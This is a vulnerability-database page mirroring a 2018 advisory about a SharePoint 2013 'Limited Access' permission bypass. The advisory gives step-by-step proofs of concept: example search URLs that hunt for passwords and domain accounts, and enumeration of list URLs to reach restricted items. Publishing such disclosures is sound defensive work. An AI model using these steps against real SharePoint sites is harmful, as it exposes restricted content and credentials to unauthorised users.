Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft SharePoint Limited Access Permission Bypass

🗓️ 07 Jan 2018 00:00:00Reported by Behnam VandaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 27 Views

Microsoft SharePoint 'Limited Access' Permission Bypass vulnerability referred to as "Limited Access" permission bypass in SharePoint 2013 and earlier versions, allowing authenticated users to access restricted content. Discovered by Behnam Vanda on January 07, 2018

Code
`vulnerability Title: Microsoft SharePoint 'Limited Access' Permission Bypass  
  
This vulnerability was discovered by 'Behnam Vanda' January 07, 2018  
  
  
======================  
I. About Vulnerability  
======================  
A permission level bypass vulnerability has been identified in microsoft sharePoint 2013 & maybe prior. This vulnerability allows attackers to open or view restricted items in the site or library. An authenticated user can bypass 'Limited Acces' permission to browse a site page or library to access a specific content item that was restricted.  
  
======================  
II. Exploit   
======================  
#POC 1 :  
  
1. Search for specific words inside web & mobile sharepoint search box: "password" "pass" "user" "domain\user" "name | lastname" & etc  
  
[~] web search : http://site/BSearch/results.aspx  
[~] mobie search : http://site/_layouts/mobile/MobileResults.aspx  
  
  
example : http://site/BSearch/results.aspx?k=password  
example : http://site/BSearch/results.aspx?k="NSA\1377"  
example : http://site/_layouts/mobile/MobileResults.aspx?k=pass  
example : http://site/_layouts/mobile/MobileResults.aspx?k=BOB  
  
  
2. The page shown some of sharepoint's search results like restricted specific item,site,library urls  
  
3. so click at the urls to access|viwe|read site page and other restricted library and items  
  
--------------------------------------  
#POC 2 :  
  
after capturing packets between our system and sharepoint site (use fiddler or brupsiute , wireshark , etc) We have access to items,list,pages,sites urls like as the following :  
  
http://site/IT/Lists/List70/AllItems.aspx  
  
so access to restricted items & lists by make /LIST#/ urls.   
  
for example :  
http://site/IT/Lists/List100/AllItems.aspx  
http://site/IT/Lists/List101/AllItems.aspx  
http://site/IT/Lists/List102/AllItems.aspx  
  
======================  
III. Affected Systems  
  
Microsoft SharePoint 2013 & maybe prior  
======================  
  
----------------------  
Behnam Vanda  
[redhathackers]  
  
E-Mail: beni[dot]vanda[at]gmail.com  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Jan 2018 00:00Current
7.1High risk
Vulners AI Score7.1
microsoft sharepointlimited accesspermission bypassbehnam vandavulnerabilityauthenticationsearch boxfiddlerwiresharkaccess controlinformation disclosure
27